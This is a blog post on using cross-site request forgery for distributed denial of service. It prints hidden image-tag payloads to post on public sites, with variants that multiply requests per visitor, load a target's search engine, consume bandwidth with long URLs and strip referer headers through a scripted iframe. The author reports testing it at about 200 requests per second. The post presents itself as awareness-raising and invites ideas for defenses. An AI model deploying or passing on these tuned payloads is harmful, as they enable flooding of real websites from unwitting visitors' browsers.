Before getting into the focus of the post I’d like to provide some background:
CSRF, like XSS, is one of the web application security industry’s skeletons in the closet. Over the years only a precious few industry insiders were aware of CSRF and appreciated its significance. The larger infosec industry discounted CSRF (and XSS) because it wasn’t “elite” enough for their taste, as it didn’t enable “root” access. All attention was instead placed on various types of buffer overflows, which are important, but not exclusively so. Web security experts, on the other hand, tend not to care about getting root on boxes because all the value now lives within the browser walls. Why hack someone’s machine when it’s easier to go after a Web bank/email/brokerage directly?
Even today on this very blog there are comments saying, “XSS is not hacking, get some real exploits”, and I’m sure most readers here have encountered similar attitudes elsewhere. It’s this type of arrogance and closed-mindedness that got us into this mess, and it’s why maybe 20% of infosec conference audiences have even heard of CSRF. Among developer audiences it’s fewer still. As a result we’re faced with a situation where millions of websites are already built (and vulnerable) by developers who never considered CSRF protection because they didn’t know it existed. Browser vendors are trying to figure out what to do and are likely years off from meaningful results. And now the bad guys have recently caught on and are beginning to cause real damage.
It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack, as it’s been rumored about in various circles for years; I’m merely drawing attention to the issue. Here’s the basic exploit code a bad guy would need:
<IMG SRC="http://victim/">
Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users will come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on: all types of websites that are quite popular, free to sign up for, and easy to automate (save for CAPTCHAs). The code instructs a user’s browser to make an HTTP request to an arbitrary location (victim) invisibly, behind the scenes, with connections originating from all over. This makes the attack difficult to stop, and obviously the more frequented the websites are, the more effective it is.
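As an aside on the “invisibly” part: an image tag pointing at a non-image URL leaves a broken-image icon at worst, and even that is easy to hide. A minimal sketch of a less conspicuous payload (the sizing and styling here are my illustration, not taken from any observed attack):

<IMG SRC="http://victim/" width="0" height="0" style="display:none" alt="">

The browser still issues the HTTP request for a hidden image; nothing is rendered for the user to notice.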
Want to increase the number of connections per user? Just multiply the number of injections per page, probably maxing out right around 10 or so per user. I’ve tested this across a dozen websites simultaneously, reaching about 200 requests per second on the target web server. Something more automated and advanced could easily surpass what I was able to accomplish.
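For example, something along these lines, repeated up to whatever the browser tolerates. The numbered query strings are my assumption: without some uniqueness per tag, the browser would treat the URLs as one cacheable resource and fetch only once.

<IMG SRC="http://victim/?1">
<IMG SRC="http://victim/?2">
<IMG SRC="http://victim/?3">
<IMG SRC="http://victim/?4">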
Want to increase the per-request CPU processing on the target? Target the search application using several keywords separated by “AND” operators, like so:
<IMG SRC="http://victim/search?q=TERM1+AND+TERM2+AND+TERM3 …">
Want to suck up a lot more bandwidth? Try URLs that are 2K or so in size:
<IMG SRC="http://victim/AAA…">
Want to scrub the referers from the requests? There are tricks for that too (one rumored approach is sketched below). Anyway, you get the idea. Anyone have any bright ideas on what a defense might be?
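On the referer-scrubbing point, here is one trick rumored around at the time. This is a sketch only; the behavior is browser-dependent, and I’m assuming the quirks of this era’s browsers rather than guaranteeing them. The idea is to script the image into an about:blank iframe, since some browsers sent no Referer header for requests born from dynamically written content:

<iframe name="blank" src="about:blank" style="display:none"></iframe>
<script>
// Dynamically writing the tag into a scripted about:blank frame
// left some browsers of this era with no referring page to report.
var doc = window.frames['blank'].document;
doc.open();
doc.write('<IMG SRC="http://victim/">');
doc.close();
</script>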